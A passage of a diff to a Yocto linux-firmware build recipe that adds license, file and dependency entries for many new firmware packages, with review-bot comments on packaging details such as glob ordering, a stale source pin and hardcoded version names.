& Firmware-moxa \
& Firmware-myri10ge_firmware \
& Firmware-netronome \
& Firmware-nvidia \
& Firmware-nxp \
+ & Firmware-nxp_mc_firmware \
& Firmware-OLPC \
& Firmware-ath9k-htc \
& Firmware-phanfw \
@@ -78,6 +83,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
+ file://LICENSE.amphion_vpu;md5=2bcdc00527b2d0542bd92b52aaec2b60 \
file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
file://LICENCE.broadcom_bcm43xx;md5=3160c14df7228891b868060e1951dfbc \
@@ -99,6 +105,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
+ file://LICENSE.ice_enhanced;md5=f305cfc31b64f95f774f9edd9df0224d \
file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
@@ -107,12 +114,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \
+ file://LICENCE.microchip;md5=db753b00305675dfbf120e3f24a47277 \
file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \
file://LICENCE.myri10ge_firmware;md5=42e32fb89f6b959ca222e25ac8df8fed \
file://LICENCE.Netronome;md5=4add08f2577086d44447996503cddf5f \
file://LICENCE.nvidia;md5=4428a922ed3ba2ceec95f076a488ce07 \
file://LICENCE.NXP;md5=58bb8ba632cd729b9ba6183bc6aed36f \
file://LICENSE.nxp;md5=cca321ca1524d6a1e4fed87486cd82dc \
+ file://LICENSE.nxp_mc_firmware;md5=9dc97e4b279b3858cae8879ae2fe5dd7 \
file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
@@ -142,7 +151,7 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
"
# WHENCE checksum is defined separately to ease overriding it if
# class-devupstream is selected.
-WHENCE_CHKSUM = "41f9a48bf27971b126a36f9344594dcd"
+WHENCE_CHKSUM = "ceb5248746d24d165b603e71b288cf75"
# These are not common licenses, set NO_GENERIC_LICENSE for them
# so that the license files will be copied from fetched source
@@ -152,6 +161,7 @@ NO_GENERIC_LICENSE[Firmware-agere] = "LICENCE.agere"
NO_GENERIC_LICENSE[Firmware-amdgpu] = "LICENSE.amdgpu"
NO_GENERIC_LICENSE[Firmware-amd-ucode] = "LICENSE.amd-ucode"
NO_GENERIC_LICENSE[Firmware-amlogic_vdec] = "LICENSE.amlogic_vdec"
+NO_GENERIC_LICENSE[Firmware-amphion_vpu] = "LICENSE.amphion_vpu"
NO_GENERIC_LICENSE[Firmware-atheros_firmware] = "LICENCE.atheros_firmware"
NO_GENERIC_LICENSE[Firmware-atmel] = "LICENSE.atmel"
NO_GENERIC_LICENSE[Firmware-broadcom_bcm43xx] = "LICENCE.broadcom_bcm43xx"
@@ -173,6 +183,7 @@ NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
+NO_GENERIC_LICENSE[Firmware-ice_enhanced] = "LICENSE.ice_enhanced"
NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2"
NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x"
NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware"
@@ -181,11 +192,13 @@ NO_GENERIC_LICENSE[Firmware-linaro] = "LICENCE.linaro"
NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium"
NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell"
NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek"
+NO_GENERIC_LICENSE[Firmware-microchip] = "LICENCE.microchip"
NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa"
NO_GENERIC_LICENSE[Firmware-myri10ge_firmware] = "LICENCE.myri10ge_firmware"
NO_GENERIC_LICENSE[Firmware-netronome] = "LICENCE.Netronome"
NO_GENERIC_LICENSE[Firmware-nvidia] = "LICENCE.nvidia"
NO_GENERIC_LICENSE[Firmware-nxp] = "LICENSE.nxp"
+NO_GENERIC_LICENSE[Firmware-nxp_mc_firmware] = "LICENSE.nxp_mc_firmware"
NO_GENERIC_LICENSE[Firmware-OLPC] = "LICENCE.OLPC"
NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
@@ -224,7 +237,7 @@ SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmw
# Pin this to the 20220509 release, override this in local.conf
SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
-SRC_URI[sha256sum] = "88d46c543847ee3b03404d4941d91c92974690ee1f6fdcbee9cef3e5f97db688"
+SRC_URI[sha256sum] = "c98d200fc4a3120de1a594713ce34e135819dff23e883a4ed387863ba25679c7"
inherit allarch
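Review bot: the context comment `# Pin this to the 20220509 release` and the `SRCREV:class-devupstream` below it are left untouched while the recipe moves to 20231030 and `WHENCE_CHKSUM` changes in an earlier hunk. A devupstream build at the old pin will not match the new WHENCE checksum unless the user overrides it, so either move the pin to the commit for the 20231030 release or extend the comment to say that `WHENCE_CHKSUM` must be overridden together with `SRCREV`.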
@@ -240,14 +253,22 @@ do_install() {
}
-PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
+PACKAGES =+ "${PN}-amphion-vpu-license ${PN}-amphion-vpu \
+ ${PN}-cw1200-license ${PN}-cw1200 \
+ ${PN}-ralink-license ${PN}-ralink \
${PN}-mt7601u-license ${PN}-mt7601u \
+ ${PN}-mt7650-license ${PN}-mt7650 \
+ ${PN}-mt76x2-license ${PN}-mt76x2 \
${PN}-radeon-license ${PN}-radeon \
${PN}-amdgpu-license ${PN}-amdgpu \
${PN}-marvell-license ${PN}-pcie8897 ${PN}-pcie8997 \
+ ${PN}-mediatek-license ${PN}-mediatek \
+ ${PN}-microchip-license ${PN}-microchip \
+ ${PN}-moxa-license ${PN}-moxa \
${PN}-sd8686 ${PN}-sd8688 ${PN}-sd8787 ${PN}-sd8797 ${PN}-sd8801 \
${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
+ ${PN}-ti-keystone-license ${PN}-ti-keystone \
${PN}-vt6656-license ${PN}-vt6656 \
${PN}-rs9113 ${PN}-rs9116 \
${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
@@ -291,7 +312,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-bcm43xx-hdr \
${PN}-cirrus-license ${PN}-cirrus \
${PN}-cnm-license ${PN}-cnm \
- ${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k ${PN}-ath3k \
+ ${PN}-atheros-license ${PN}-ar5523 ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k ${PN}-ath3k \
${PN}-gplv2-license ${PN}-carl9170 \
${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \
\
@@ -317,6 +338,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-ibt-misc \
${PN}-i915-license ${PN}-i915 \
${PN}-ice-license ${PN}-ice \
+ ${PN}-ice-enhanced-license ${PN}-ice-enhanced \
${PN}-adsp-sst-license ${PN}-adsp-sst \
${PN}-bnx2-mips \
${PN}-liquidio \
@@ -333,15 +355,21 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-nxp9098-sdio \
${PN}-nxpiw416-sdio \
${PN}-nxpiw612-sdio \
+ ${PN}-nxp-mc-license ${PN}-nxp-mc \
${PN}-netronome-license ${PN}-netronome \
+ ${PN}-olpc-license ${PN}-olpc \
+ ${PN}-phanfw-license ${PN}-phanfw \
${PN}-qat ${PN}-qat-license \
${PN}-qcom-license ${PN}-qcom-yamato-license \
- ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
+ ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 ${PN}-qcom-venus-6.0 \
${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
- ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
+ ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 ${PN}-qcom-adreno-a702 \
${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
+ ${PN}-qcom-qcm2290-adreno ${PN}-qcom-qcm2290-audio ${PN}-qcom-qcm2290-modem ${PN}-qcom-qcm2290-wifi \
+ ${PN}-qcom-qrb4210-adreno ${PN}-qcom-qrb4210-audio ${PN}-qcom-qrb4210-compute \
+ ${PN}-qcom-qrb4210-modem ${PN}-qcom-qrb4210-wifi \
${PN}-qcom-sc8280xp-lenovo-x13s-compat \
${PN}-qcom-sc8280xp-lenovo-x13s-audio \
${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
@@ -350,13 +378,39 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
${PN}-qcom-sdm845-thundercomm-db845c-sensors \
${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
+ ${PN}-qcom-sm8250-thundercomm-rb5-sensors \
+ ${PN}-qla2xxx ${PN}-qla2xxx-license \
${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
${PN}-lt9611uxc ${PN}-lontium-license \
${PN}-whence-license \
+ ${PN}-wl1251-license ${PN}-wl1251 \
+ ${PN}-xc4000-license ${PN}-xc4000 \
+ ${PN}-xc5000-license ${PN}-xc5000 \
+ ${PN}-xc5000c-license ${PN}-xc5000c \
${PN}-license \
"
+# For Amphion VPU
+LICENSE:${PN}-amphion-vpu = "Firmware-amphion_vpu"
+LICENSE:${PN}-amphion-vpu-license = "Firmware-amphion_vpu"
+
+FILES:${PN}-amphion-vpu = "${nonarch_base_libdir}/firmware/amphion/*"
+FILES:${PN}-amphion-vpu-license = " \
+ ${nonarch_base_libdir}/firmware/LICENSE.amphion_vpu \
+"
+RDEPENDS:${PN}-amphion-vpu += "${PN}-amphion-vpu-license"
+
+# For cw1200
+LICENSE:${PN}-cw1200 = "Firmware-cw1200"
+LICENSE:${PN}-cw1200-license = "Firmware-cw1200"
+
+FILES:${PN}-cw1200 = "${nonarch_base_libdir}/firmware/wsm_22.bin"
+FILES:${PN}-cw1200-license = "${nonarch_base_libdir}/firmware/LICENCE.cw1200"
+
+RDEPENDS:${PN}-cw1200 += "${PN}-cw1200-license"
+
# For atheros
+LICENSE:${PN}-ar5523 = "Firmware-atheros_firmware"
LICENSE:${PN}-ar9170 = "Firmware-atheros_firmware"
LICENSE:${PN}-ath3k = "Firmware-atheros_firmware"
LICENSE:${PN}-ath6k = "Firmware-atheros_firmware"
@@ -364,6 +418,9 @@ LICENSE:${PN}-ath9k = "Firmware-atheros_firmware"
LICENSE:${PN}-atheros-license = "Firmware-atheros_firmware"
FILES:${PN}-atheros-license = "${nonarch_base_libdir}/firmware/LICENCE.atheros_firmware"
+FILES:${PN}-ar5523 = " \
+ ${nonarch_base_libdir}/firmware/ar5523.bin \
+"
FILES:${PN}-ar9170 = " \
${nonarch_base_libdir}/firmware/ar9170*.fw \
"
@@ -382,6 +439,7 @@ FILES:${PN}-ath9k = " \
${nonarch_base_libdir}/firmware/ath9k_htc/htc_9271-1.4.0.fw \
"
+RDEPENDS:${PN}-ar5523 += "${PN}-atheros-license"
RDEPENDS:${PN}-ar9170 += "${PN}-atheros-license"
RDEPENDS:${PN}-ath6k += "${PN}-atheros-license"
RDEPENDS:${PN}-ath9k += "${PN}-atheros-license"
@@ -445,11 +503,73 @@ LICENSE:${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
FILES:${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
FILES:${PN}-mt7601u = " \
${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
+ ${nonarch_base_libdir}/firmware/mt7601u.bin \
"
-
RDEPENDS:${PN}-mt7601u += "${PN}-mt7601u-license"
+# For MediaTek Bluetooth USB driver 7650
+LICENSE:${PN}-mt7650 = "Firmware-ralink_a_mediatek_company_firmware"
+LICENSE:${PN}-mt7650-license = "Firmware-ralink_a_mediatek_company_firmware"
+
+FILES:${PN}-mt7650-license = " \
+ ${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware \
+"
+FILES:${PN}-mt7650 = " \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7650.bin \
+ ${nonarch_base_libdir}/firmware/mt7650.bin \
+"
+RDEPENDS:${PN}-mt7650 += "${PN}-mt7650-license"
+
+# For MediaTek MT76x2 Wireless MACs
+LICENSE:${PN}-mt76x2 = "Firmware-ralink_a_mediatek_company_firmware"
+LICENSE:${PN}-mt76x2-license = "Firmware-ralink_a_mediatek_company_firmware"
+
+FILES:${PN}-mt76x2-license = " \
+ ${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware \
+"
+FILES:${PN}-mt76x2 = " \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7662.bin \
+ ${nonarch_base_libdir}/firmware/mt7662.bin \
+ ${nonarch_base_libdir}/firmware/mediatek/mt7662_rom_patch.bin \
+ ${nonarch_base_libdir}/firmware/mt7662_rom_patch.bin \
+"
+RDEPENDS:${PN}-mt76x2 += "${PN}-mt76x2-license"
+
+# For MediaTek
+LICENSE:${PN}-mediatek = "Firmware-mediatek"
+LICENSE:${PN}-mediatek-license = "Firmware-mediatek"
+
+FILES:${PN}-mediatek = " \
+ ${nonarch_base_libdir}/firmware/mediatek/* \
+ ${nonarch_base_libdir}/firmware/vpu_d.bin \
+ ${nonarch_base_libdir}/firmware/vpu_p.bin \
+"
+FILES:${PN}-mediatek-license = " \
+ ${nonarch_base_libdir}/firmware/LICENCE.mediatek \
+"
+RDEPENDS:${PN}-mediatek += "${PN}-mediatek-license"
+
+# For Microchip
+LICENSE:${PN}-microchip = "Firmware-microchip"
+LICENSE:${PN}-microchip-license = "Firmware-microchip"
+
+FILES:${PN}-microchip = "${nonarch_base_libdir}/firmware/microchip/*"
+FILES:${PN}-microchip-license = " \
+ ${nonarch_base_libdir}/firmware/LICENCE.microchip \
+"
+RDEPENDS:${PN}-microchip += "${PN}-microchip-license"
+
+# For MOXA
+LICENSE:${PN}-moxa = "Firmware-moxa"
+LICENSE:${PN}-moxa-license = "Firmware-moxa"
+
+FILES:${PN}-moxa = "${nonarch_base_libdir}/firmware/moxa"
+FILES:${PN}-moxa-license = "${nonarch_base_libdir}/firmware/LICENCE.moxa"
+
+RDEPENDS:${PN}-moxa += "${PN}-moxa-license"
+
# For radeon
+
LICENSE:${PN}-radeon = "Firmware-radeon"
LICENSE:${PN}-radeon-license = "Firmware-radeon"
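Review bot: `FILES:${PN}-mediatek` uses the glob `${nonarch_base_libdir}/firmware/mediatek/*`, which also matches the `mediatek/mt7601u.bin`, `mediatek/mt7650.bin` and `mediatek/mt7662*.bin` files claimed by the mt7601u, mt7650 and mt76x2 packages in this same hunk. Files go to the first matching package in PACKAGES, so the split is correct only because those three are listed before `${PN}-mediatek` there; add a comment recording that ordering requirement. The same first-match rule applies to `${PN}-mt7650-license` and `${PN}-mt76x2-license`, which list the same `LICENCE.ralink_a_mediatek_company_firmware` file as `${PN}-mt7601u-license`, so check that they do not end up empty. Minor: `FILES:${PN}-moxa` names the directory without `/*` unlike the other new entries, and the blank line added after `# For radeon` looks unintended.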
@@ -604,6 +724,16 @@ RDEPENDS:${PN}-nxp9098-sdio += "${PN}-nxp9098-common"
RDEPENDS:${PN}-nxpiw416-sdio += "${PN}-nxp-license"
RDEPENDS:${PN}-nxpiw612-sdio += "${PN}-nxp-license"
+# For nxp-mc
+LICENSE:${PN}-nxp-mc = "Firmware-nxp_mc_firmware"
+LICENSE:${PN}-nxp-mc-license = "Firmware-nxp_mc_firmware"
+
+FILES:${PN}-nxp-mc= "${nonarch_base_libdir}/firmware/dpaa2/mc/*"
+FILES:${PN}-nxp-mc-license = " \
+ ${nonarch_base_libdir}/firmware/LICENSE.nxp_mc_firmware \
+"
+RDEPENDS:${PN}-nxp-mc += "${PN}-nxp-mc-license"
+
# For Nvidia
LICENSE:${PN}-nvidia-gpu = "Firmware-nvidia"
LICENSE:${PN}-nvidia-tegra = "Firmware-nvidia"
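Review bot: `FILES:${PN}-nxp-mc= "${nonarch_base_libdir}/firmware/dpaa2/mc/*"` is missing the space before `=` that every other assignment in this recipe uses. It parses the same, but write it as `FILES:${PN}-nxp-mc = ...` so that searches for the usual `FILES:${PN}-<name> =` form find it.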
@@ -626,6 +756,37 @@ RDEPENDS:${PN}-nvidia-gpu += "${PN}-nvidia-license"
RDEPENDS:${PN}-nvidia-tegra += "${PN}-nvidia-license"
RDEPENDS:${PN}-nvidia-tegra-k1 += "${PN}-nvidia-license"
+# For OLPC
+LICENSE:${PN}-olpc = "Firmware-OLPC"
+LICENSE:${PN}-olpc-license = "Firmware-OLPC"
+
+FILES:${PN}-olpc = " \
+ ${nonarch_base_libdir}/firmware/libertas/lbtf_sdio.bin \
+ ${nonarch_base_libdir}/firmware/lbtf_usb.bin \
+ ${nonarch_base_libdir}/firmware/libertas/usb8388_olpc.bin \
+"
+FILES:${PN}-olpc-license = "${nonarch_base_libdir}/firmware/LICENCE.OLPC"
+
+RDEPENDS:${PN}-olpc += "${PN}-olpc-license"
+
+# For phanfw
+LICENSE:${PN}-phanfw = "Firmware-phanfw"
+LICENSE:${PN}-phanfw-license = "Firmware-phanfw"
+
+FILES:${PN}-phanfw = "${nonarch_base_libdir}/firmware/phanfw.bin"
+FILES:${PN}-phanfw-license = "${nonarch_base_libdir}/firmware/LICENCE.phanfw"
+
+RDEPENDS:${PN}-phanfw += "${PN}-phanfw-license"
+
+# For qla2xxx
+LICENSE:${PN}-qla2xxx = "Firmware-qla2xxx"
+LICENSE:${PN}-qla2xxx-license = "Firmware-qla2xxx"
+
+FILES:${PN}-qla2xxx = "${nonarch_base_libdir}/firmware/ql2*"
+FILES:${PN}-qla2xxx-license = "${nonarch_base_libdir}/firmware/LICENCE.qla2xxx"
+
+RDEPENDS:${PN}-qla2xxx += "${PN}-qla2xxx-license"
+
# For RSI RS911x WiFi
LICENSE:${PN}-rs9113 = "WHENCE"
LICENSE:${PN}-rs9116 = "WHENCE"
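Review bot: in `FILES:${PN}-olpc`, `lbtf_usb.bin` is listed at the top of the firmware directory while the other two entries sit under `libertas/`. If that matches the installed layout, a short comment saying so would stop the next reader from "fixing" the path. If it does not, the pattern matches nothing and the file ends up in whichever later package has a glob that covers it.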
@@ -668,6 +829,7 @@ FILES:${PN}-rtl8723 = " \
"
FILES:${PN}-rtl8821 = " \
${nonarch_base_libdir}/firmware/rtlwifi/rtl8821*.bin \
+ ${nonarch_base_libdir}/firmware/rtw88/rtw8821*.bin \
"
FILES:${PN}-rtl8761 = " \
${nonarch_base_libdir}/firmware/rtl_bt/rtl8761*.bin \
@@ -691,6 +853,18 @@ RDEPENDS:${PN}-rtl8761 += "${PN}-rtl-license"
RDEPENDS:${PN}-rtl8822 += "${PN}-rtl-license"
RDEPENDS:${PN}-rtl8168 += "${PN}-whence-license"
+# For TI wl1251
+LICENSE:${PN}-wl1251 = "Firmware-wl1251"
+LICENSE:${PN}-wl1251-license = "Firmware-wl1251"
+
+FILES:${PN}-wl1251 = " \
+ ${nonarch_base_libdir}/firmware/ti-connectivity/wl1251-fw.bin \
+ ${nonarch_base_libdir}/firmware/ti-connectivity/wl1251-nvs.bin \
+"
+FILES:${PN}-wl1251-license = "${nonarch_base_libdir}/firmware/LICENCE.wl1251"
+
+RDEPENDS:${PN}-wl1251 += "${PN}-wl1251-license"
+
# For ti-connectivity
LICENSE:${PN}-wlcommon = "Firmware-ti-connectivity"
LICENSE:${PN}-wl12xx = "Firmware-ti-connectivity"
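Review bot: the two `wl1251-*.bin` files live in `ti-connectivity/` and their names start with `wl12`, the same prefix as the `${PN}-wl12xx` package declared just below. The FILES patterns for wlcommon/wl12xx are not part of this hunk, so please confirm that `${PN}-wl1251` is listed ahead of them in PACKAGES. Otherwise an existing glob could claim these files first and leave the new package empty, with the Firmware-wl1251 license never pulled in.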
@@ -720,6 +894,16 @@ FILES:${PN}-wl18xx = " \
RDEPENDS:${PN}-wl12xx = "${PN}-ti-connectivity-license ${PN}-wlcommon"
RDEPENDS:${PN}-wl18xx = "${PN}-ti-connectivity-license ${PN}-wlcommon"
+# For ti-keystone
+LICENSE:${PN}-ti-keystone = "Firmware-ti-keystone"
+LICENSE:${PN}-ti-keystone-license = "Firmware-ti-keystone"
+
+FILES:${PN}-ti-keystone = "${nonarch_base_libdir}/firmware/ti-keystone/*"
+FILES:${PN}-ti-keystone-license = " \
+ ${nonarch_base_libdir}/firmware/LICENCE.ti-keystone \
+"
+RDEPENDS:${PN}-ti-keystone += "${PN}-ti-keystone-license"
+
# For vt6656
LICENSE:${PN}-vt6656 = "Firmware-via_vt6656"
LICENSE:${PN}-vt6656-license = "Firmware-via_vt6656"
@@ -731,6 +915,35 @@ FILES:${PN}-vt6656 = " \
RDEPENDS:${PN}-vt6656 = "${PN}-vt6656-license"
+# For xc4000
+LICENSE:${PN}-xc4000 = "Firmware-xc4000"
+LICENSE:${PN}-xc4000-license = "Firmware-xc4000"
+
+FILES:${PN}-xc4000 = "${nonarch_base_libdir}/firmware/dvb-fe-xc4000-1.4.1.fw"
+FILES:${PN}-xc4000-license = "${nonarch_base_libdir}/firmware/LICENCE.xc4000"
+
+RDEPENDS:${PN}-xc4000 += "${PN}-xc4000-license"
+
+# For xc5000
+LICENSE:${PN}-xc5000 = "Firmware-xc5000"
+LICENSE:${PN}-xc5000-license = "Firmware-xc5000"
+
+FILES:${PN}-xc5000 = "${nonarch_base_libdir}/firmware/dvb-fe-xc5000-1.6.114.fw"
+FILES:${PN}-xc5000-license = "${nonarch_base_libdir}/firmware/LICENCE.xc5000"
+
+RDEPENDS:${PN}-xc5000 += "${PN}-xc5000-license"
+
+# For xc5000c
+LICENSE:${PN}-xc5000c = "Firmware-xc5000c"
+LICENSE:${PN}-xc5000c-license = "Firmware-xc5000c"
+
+FILES:${PN}-xc5000c = " \
+ ${nonarch_base_libdir}/firmware/dvb-fe-xc5000c-4.1.30.7.fw \
+"
+FILES:${PN}-xc5000c-license = "${nonarch_base_libdir}/firmware/LICENCE.xc5000c"
+
+RDEPENDS:${PN}-xc5000c += "${PN}-xc5000c-license"
+
# For broadcom
# for i in `grep brcm WHENCE | grep ^File | sed 's/File: brcm.//g'`; do pkg=`echo $i | sed 's/-[sp40].*//g; s/\.bin//g; s/brcmfmac/bcm/g; s/_hdr/-hdr/g; s/BCM/bcm-0bb4-0306/g'`; echo -e " \${PN}-$pkg \\"; done | sort -u
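Review bot: the three xc4000/xc5000/xc5000c FILES entries hardcode the firmware version in the file name (`dvb-fe-xc4000-1.4.1.fw`, `dvb-fe-xc5000-1.6.114.fw`, `dvb-fe-xc5000c-4.1.30.7.fw`). A later linux-firmware bump that ships a new version will match nothing and silently move the blob into the catch-all package, away from its license dependency. A pattern such as `dvb-fe-xc4000-*.fw` keeps the packages separate (the `-` after the chip name still distinguishes xc5000 from xc5000c) and survives version changes.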
@@ -1053,10 +1266,26 @@ FILES:${PN}-i915-license = "${nonarch_base_libdir}/firmware/LICENSE.i915"
FILES:${PN}-i915 = "${nonarch_base_libdir}/firmware/i915"
RDEPENDS:${PN}-i915 = "${PN}-i915-license"
+# For ice-enhanced
+LICENSE:${PN}-ice-enhanced = "Firmware-ice_enhanced"
+LICENSE:${PN}-ice-enhanced-license = "Firmware-ice_enhanced"
+
+FILES:${PN}-ice-enhanced = " \
+ ${nonarch_base_libdir}/firmware/intel/ice/ddp-comms/* \
+ ${nonarch_base_libdir}/firmware/intel/ice/ddp-wireless_edge/* \
+"
+FILES:${PN}-ice-enhanced-license = " \
+ ${nonarch_base_libdir}/firmware/LICENSE.ice_enhanced \
+"
+RDEPENDS:${PN}-ice-enhanced = "${PN}-ice-enhanced-license"
+
LICENSE:${PN}-ice = "Firmware-ice"
LICENSE:${PN}-ice-license = "Firmware-ice"
FILES:${PN}-ice-license = "${nonarch_base_libdir}/firmware/LICENSE.ice"
-FILES:${PN}-ice = "${nonarch_base_libdir}/firmware/intel/ice"
+FILES:${PN}-ice = " \
+ ${nonarch_base_libdir}/firmware/intel/ice/ddp/* \
+ ${nonarch_base_libdir}/firmware/intel/ice/ddp-lag/* \
+"
RDEPENDS:${PN}-ice = "${PN}-ice-license"
FILES:${PN}-adsp-sst-license = "${nonarch_base_libdir}/firmware/LICENCE.adsp_sst"
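Review bot: `FILES:${PN}-ice` goes from owning the whole `intel/ice` directory to owning only `ddp/*` and `ddp-lag/*`, with `ddp-comms/*` and `ddp-wireless_edge/*` going to `${PN}-ice-enhanced`. Any other subdirectory that appears under `intel/ice` in a future firmware update will now fall through to the catch-all package without the Firmware-ice license dependency; a comment listing the expected subdirectories would make that easier to spot at upgrade time. Minor: the new `RDEPENDS:${PN}-ice-enhanced` uses `=` while the other packages added in this patch use `+=`.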
@@ -1079,6 +1308,7 @@ LICENSE:${PN}-qcom-venus-1.8 = "Firmware-qcom"
LICENSE:${PN}-qcom-venus-4.2 = "Firmware-qcom"
LICENSE:${PN}-qcom-venus-5.2 = "Firmware-qcom"
LICENSE:${PN}-qcom-venus-5.4 = "Firmware-qcom"
+LICENSE:${PN}-qcom-venus-6.0 = "Firmware-qcom"
LICENSE:${PN}-qcom-vpu-1.0 = "Firmware-qcom"
LICENSE:${PN}-qcom-vpu-2.0 = "Firmware-qcom"
LICENSE:${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
@@ -1088,11 +1318,21 @@ LICENSE:${PN}-qcom-adreno-a530 = "Firmware-qcom"
LICENSE:${PN}-qcom-adreno-a630 = "Firmware-qcom"
LICENSE:${PN}-qcom-adreno-a650 = "Firmware-qcom"
LICENSE:${PN}-qcom-adreno-a660 = "Firmware-qcom"
+LICENSE:${PN}-qcom-adreno-a702 = "Firmware-qcom"
LICENSE:${PN}-qcom-apq8016-modem = "Firmware-qcom"
LICENSE:${PN}-qcom-apq8016-wifi = "Firmware-qcom"
LICENSE:${PN}-qcom-apq8096-audio = "Firmware-qcom"
LICENSE:${PN}-qcom-apq8096-adreno = "Firmware-qcom"
LICENSE:${PN}-qcom-apq8096-modem = "Firmware-qcom"
+LICENSE:${PN}-qcom-qcm2290-adreno = "Firmware-qcom"
+LICENSE:${PN}-qcom-qcm2290-audio = "Firmware-qcom"
+LICENSE:${PN}-qcom-qcm2290-modem = "Firmware-qcom"
+LICENSE:${PN}-qcom-qcm2290-wifi = "Firmware-qcom"
+LICENSE:${PN}-qcom-qrb4210-adreno = "Firmware-qcom"
+LICENSE:${PN}-qcom-qrb4210-audio = "Firmware-qcom"
+LICENSE:${PN}-qcom-qrb4210-compute = "Firmware-qcom"
+LICENSE:${PN}-qcom-qrb4210-modem = "Firmware-qcom"
+LICENSE:${PN}-qcom-qrb4210-wifi = "Firmware-qcom"
LICENSE:${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom & Firmware-linaro"
